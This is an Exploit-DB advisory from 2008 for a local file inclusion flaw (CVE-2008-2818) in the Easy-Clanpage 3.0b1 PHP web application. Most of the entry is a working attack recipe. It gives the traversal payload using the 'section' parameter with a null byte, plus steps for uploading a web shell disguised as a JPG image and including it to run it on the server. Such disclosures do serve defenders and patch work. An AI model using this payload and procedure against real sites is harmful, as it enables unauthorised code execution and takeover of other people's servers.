Easy-Clanpage 3.0b1 section Local File Inclusion Vulnerability

2008-06-13T00:00:00
ID EDB-ID:5801
Type exploitdb
Reporter Loader007
Modified 2008-06-13T00:00:00

Description

Easy-Clanpage 3.0b1 (section) Local File Inclusion Vulnerability. CVE-2008-2818. Webapps exploit for php platform

                                        
                                            ####################################################################################
#LFI Exploit by Loader007
#
#you can connect me for questions ICQ:488525928
#
#Script:Easy-Clanpage 3.0b1
#
#download: 
http://www.easy-clanpage.de/?section=downloads&show=viewdownload&id=24
#
#http://example.de/path/?section=[LFI]%00
#
###################################################################################
#HowTo use it
#
#1: make a account
#2: up shell as jpg not bigger than 50kb!
#3: incude the jpg with http://example.de/path/?section=../path/to/image%00
#
#greetz to
#sys-flaw.com
#my friend's Tr0n,N1ReeXz and all the others
###################################################################################

# milw0rm.com [2008-06-13]